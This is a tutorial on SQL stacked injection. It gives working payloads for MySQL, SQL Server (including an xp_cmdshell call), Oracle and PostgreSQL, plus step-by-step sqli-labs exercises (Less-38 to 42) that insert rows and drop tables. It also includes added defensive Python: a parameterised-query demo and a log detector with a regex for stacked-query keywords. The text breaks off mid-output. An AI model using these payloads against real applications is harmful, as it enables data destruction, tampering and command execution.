
Title: Stacking Injection Detailed Explanation


0x00 Stack Injection Definition

Stacked injection: as the name suggests, it is a batch of SQL statements (several at once) executed together, and that is indeed how it works in practice. In MySQL, a semicolon (;) appended to a statement marks the end of that statement. It follows that several statements could be chained together and submitted at once; doing this through an injection point is what is called stacked injection.

0x01 Stacking Injection Principle

In SQL, the semicolon (;) marks the end of a statement. Suppose we keep constructing the next statement right after the end of one: will both be executed? That idea is what gives rise to stacked injection. Union injection also joins two statements together, so what is the difference? A union (or union all) can only combine query statements, whereas stacked injection can execute arbitrary statements. For example, with the user input:

1; DELETE FROM products

the server-side SQL statement becomes:

Select * from products where productid=1; DELETE FROM products

When this runs, the first statement returns the query result and the second deletes the entire table.

0x02 Limitations of stack injection

The limitation of stacked injection is that it cannot be executed in every environment; it may be blocked by the database API or by the database engine. Insufficient privileges can of course also explain why an attacker cannot modify data or call certain procedures.

[figure from the original article, not reproduced here]

This figure is taken from the original article. My own test environment is PHP + MySQL, where stacked queries can be executed, so the MySQL/PHP entry in the figure is questionable; my guess is that the original author's version differs from mine. Although we said above that stacked queries can execute arbitrary SQL statements, the technique is far from perfect. In a typical web application the code returns only the result of a single query, so the second statement of a stacked injection either produces an error or has its result silently discarded, and nothing from it is visible in the front-end interface. For reading data, union injection is therefore recommended. Stacked injection also requires prior knowledge of the database, such as table names and column names.
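The following Python is an added example (not from the original post): it uses sqlite3 in place of the PHP + MySQL setup to show the three cases the two sections above describe, a driver that refuses a second statement, a driver that runs every statement in the string, and a parameterised query that never treats the input as SQL. The table, the helper names fresh_db and rows_left, and STACKED_INPUT are my own.

```python
import sqlite3

# Constructed demo data standing in for the products table of section 0x01.
def fresh_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE products (productid INTEGER, name TEXT)")
    con.executemany("INSERT INTO products VALUES (?, ?)", [(1, "a"), (2, "b")])
    con.commit()
    return con

def rows_left(con):
    return con.execute("SELECT COUNT(*) FROM products").fetchone()[0]

# The attacker-controlled value from section 0x01.
STACKED_INPUT = "1; DELETE FROM products"

def concat_single_statement_api(user_input):
    """String concatenation through an API that executes one statement per
    call (sqlite3's execute(); mysqli_query() behaves alike).
    Returns (rows left, error text or None)."""
    con = fresh_db()
    try:
        con.execute("SELECT * FROM products WHERE productid=" + user_input)
        return rows_left(con), None
    except (sqlite3.Warning, sqlite3.ProgrammingError) as err:
        # The driver rejects the second statement, so the DELETE never runs.
        return rows_left(con), str(err)

def concat_multi_statement_api(user_input):
    """Same concatenation through an API that runs every statement in the
    string (sqlite3's executescript(); mysqli_multi_query() behaves alike)."""
    con = fresh_db()
    con.executescript("SELECT * FROM products WHERE productid=" + user_input)
    con.commit()
    return rows_left(con)   # 0: the stacked DELETE emptied the table

def parameterised(user_input):
    """Bound parameter: the whole input is compared as one value and is
    never parsed as SQL. Returns (rows left, rows matched)."""
    con = fresh_db()
    hits = con.execute("SELECT * FROM products WHERE productid=?",
                       (user_input,)).fetchall()
    return rows_left(con), len(hits)

if __name__ == "__main__":
    print(concat_single_statement_api(STACKED_INPUT))
    print(concat_multi_statement_api(STACKED_INPUT))
    print(parameterised(STACKED_INPUT), parameterised("1"))
```

The single-statement API is only a side effect of the driver, not a fix; the parameterised form is the one that removes the injection regardless of which API the code base uses.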

0x03 Introduction to each database instance

This section goes through the use of stacked injection against several common databases, covering the basic database operations: create, delete, read and update. The basic stacked-injection operations for each database are listed below.

1. MySQL

(1) Create a new table

select * from users where id=1; create table test like users;


After the statement executes successfully, check whether the new table was created.


(2) Delete the newly created test table above

select * from users where id=1; drop table test;


(3) Query data

select * from users where id=1; select 1,2,3;


(4) Load the file

select * from users where id=1; select load_file('c:/tmpupbbn.php');


(5) Modify the data

select * from users where id=1; insert into users(id,username,password) values('100','new','new');


2. SQL Server

(1) Create a data table

select * from test; create table sc3(ss CHAR(8));


(2) Delete the data table

select * from test; drop table sc3;


(3) Query data

select 1,2,3; select * from test;


(4) Modify the data

select * from test; update test set name='test' where id=3;


(5) Execution of stored procedures, the most important case in SQL Server

select * from test where id=1; exec master.xp_cmdshell 'ipconfig'


3. Oracle

As mentioned in the introduction above, Oracle cannot be used for stacked injection. The figure shows that as soon as two statements are placed on the same line an error is reported: invalid character. I did not try any further.


4. PostgreSQL

(1) Create a new table

select * from user_test; create table user_data(id DATE);


You can see that the user_data table has been built.

(2) Delete the newly created user_data table above

select * from user_test; delete from user_data;


(3) Query data

select * from user_test; select 1,2,3;

(4) Modify data

select * from user_test; update user_test set name='modify' where name='Zhang San';


0x04 Stacked injection in the sqli-labs series

1. Less-38

Stack Injection - Character Type - GET

(1) Source Code

$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";

(2) Test

?id=1';insert into users(id,username,password) values ('38','less38','hello')--+

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | Stupid   | Stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 38 | less38   | hello      |
+----+----------+------------+
14 rows in set (0.00 sec)

A less38 user has been added.

?id=1';create table less38 like users;

?id=1';drop table less38;

2. Less-39

Stack Injection - Integer - GET

(1) Source Code

$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";

(2) Test

?id=1;insert into users(id,username,password) values ('39','less39','hello')--+

mysql> select * from users;
+----+----------+------------+
| id | username | password   |
+----+----------+------------+
|  1 | Dumb     | Dumb       |
|  2 | Angelina | I-kill-you |
|  3 | Dummy    | p@ssword   |
|  4 | secure   | crappy     |
|  5 | Stupid   | Stupidity  |
|  6 | superman | genious    |
|  7 | batman   | mob!le     |
|  8 | admin    | admin      |
|  9 | admin1   | admin1     |
| 10 | admin2   | admin2     |
| 11 | admin3   | admin3     |
| 12 | dhakkan  | dumbo      |
| 14 | admin4   | admin4     |
| 38 | less38   | hello      |
| 39 | less39   | hello      |
+----+----------+------------+
15 rows in set (0.00 sec)

The less39 user has been added.

?id=1;create table less39 like users;

?id=1;drop table less39;

3. Less-40

Blind - Stack Injection - GET

(1) Source Code

$sql = "SELECT * FROM users WHERE id=('$id') LIMIT 0,1";

(2) Test

?id=1'); insert into users(id,username,password) values ('40','less40','hello')--+

mysql> select * from users;
+-----+----------+------------+
| id  | username | password   |
+-----+----------+------------+
|   1 | Dumb     | Dumb       |
|   2 | Angelina | I-kill-you |
|   3 | Dummy    | p@ssword   |
|   4 | secure   | crappy     |
|   5 | Stupid   | Stupidity  |
|   6 | superman | genious    |
|   7 | batman   | mob!le     |
|   8 | admin    | admin      |
|   9 | admin1   | admin1     |
|  10 | admin2   | admin2     |
|  11 | admin3   | admin3     |
|  12 | dhakkan  | dumbo      |
|  14 | admin4   | admin4     |
|  38 | less38   | hello      |
|  39 | less39   | hello      |
| 109 | hello    | hello      |
|  40 | less40   | hello      |
+-----+----------+------------+
17 rows in set (0.00 sec)

The added less40 user can be seen.

?id=1');create table less40 like users;

?id=1');drop table less40;

4. Less-41

Blind - Stack Injection - Integer - GET

(1) Source Code

$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";

(2) Test (blind)

Add a row to the users table:

?id=1; insert into users(id,username,password) values ('110','less41','hello')--+

mysql> select * from users;
+-----+----------+------------+
| id  | username | password   |
+-----+----------+------------+
|   1 | Dumb     | Dumb       |
|   2 | Angelina | I-kill-you |
|   3 | Dummy    | p@ssword   |
|   4 | secure   | crappy     |
|   5 | Stupid   | Stupidity  |
|   6 | superman | genious    |
|   7 | batman   | mob!le     |
|   8 | admin    | admin      |
|   9 | admin1   | admin1     |
|  10 | admin2   | admin2     |
|  11 | admin3   | admin3     |
|  12 | dhakkan  | dumbo      |
|  14 | admin4   | admin4     |
|  38 | less38   | hello      |
|  39 | less39   | hello      |
| 109 | hello    | hello      |
|  40 | less40   | hello      |
| 110 | less41   | hello      |
+-----+----------+------------+
18 rows in set (0.00 sec)

User less41 has been added.

?id=1;create table less41 like users; // Add table

?id=1;drop table less41; // Delete table
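Because every one of the Less-38 to Less-41 payloads above has the same shape in the request (a statement terminator followed by a fresh statement), the web server's access log is a cheap place to spot such attempts. The following Python is an added example, not part of the original post: it URL-decodes the query string of each GET request and flags those that match that shape. The log lines are constructed from the requests above (not real traffic), the regular expressions are my own, and a production rule would need broader keyword and encoding coverage.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample in common log format (not real traffic):
# one benign request, three stacked-injection requests as used against
# Less-38/39/40 above, and a harmless search containing a semicolon.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Dec/2021:00:37:41 +0800] "GET /Less-38/?id=1 HTTP/1.1" 200 1275
10.0.0.5 - - [16/Dec/2021:00:37:42 +0800] "GET /Less-38/?id=1%27;insert+into+users(id,username,password)+values+(%2738%27,%27less38%27,%27hello%27)--+ HTTP/1.1" 200 1275
10.0.0.5 - - [16/Dec/2021:00:37:43 +0800] "GET /Less-39/?id=1;create+table+less39+like+users; HTTP/1.1" 200 1275
10.0.0.5 - - [16/Dec/2021:00:37:44 +0800] "GET /Less-40/?id=1%27);drop+table+less40; HTTP/1.1" 200 1275
10.0.0.5 - - [16/Dec/2021:00:37:45 +0800] "GET /search/?q=milk;+eggs HTTP/1.1" 200 512
"""

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# A semicolon followed by a keyword that begins a new statement is the
# signature of a stacked query; a bare ';' in ordinary text does not match.
STACKED_RE = re.compile(
    r";\s*(?:select|insert|update|delete|drop|create|alter|exec)\b",
    re.IGNORECASE)

def stacked_query_hits(log_text):
    """Return (line number, path, decoded query string) for every request
    whose decoded query string looks like a stacked SQL statement."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m or "?" not in m.group(1):
            continue
        path, _, query = m.group(1).partition("?")
        # Decode %27 and '+' once, as the web server does before the
        # application sees the value; the raw log would hide the quotes.
        decoded = unquote_plus(query)
        if STACKED_RE.search(decoded):
            hits.append((lineno, path, decoded))
    return hits

if __name__ == "__main__":
    for lineno, path, query in stacked_query_hits(SAMPLE_LOG):
        print(f"line {lineno}: {path} -> {query}")
```

Matching on the decoded value matters: the quote and the keyword in the Less-38 request only appear after %27 and + are translated.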

5. Less-42

Error-based stacked injection - character type - POST

(1) Source code (login.php):

$username = mysqli_real_escape_string($con1, $_POST['login_user']);
$password = $_POST['login_password'];
$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

The password variable is not passed through the mysql_real_escape_string() function during POST processing. Therefore, when logging in, we can attack the password field.

(2) Error test

Test statements:

username: any
password: c';drop table me#          # Delete the me table

or:

username: any
password: c';create table me like users#   // Create a me table

Check the tables before logging in:

mysql> show tables;
+--------------------+
| Tables_in_security |
+--------------------+
| emails             |
| referers           |
| uagents            |
| users              |
+--------------------+
4 rows in set (0.00 sec)

Create a table while logging in:

username: admin
password: c';create table less42 like users#

Log in, then view the created table:

mysql> show tables;
+--------------------+
| Tables_in_security |
+
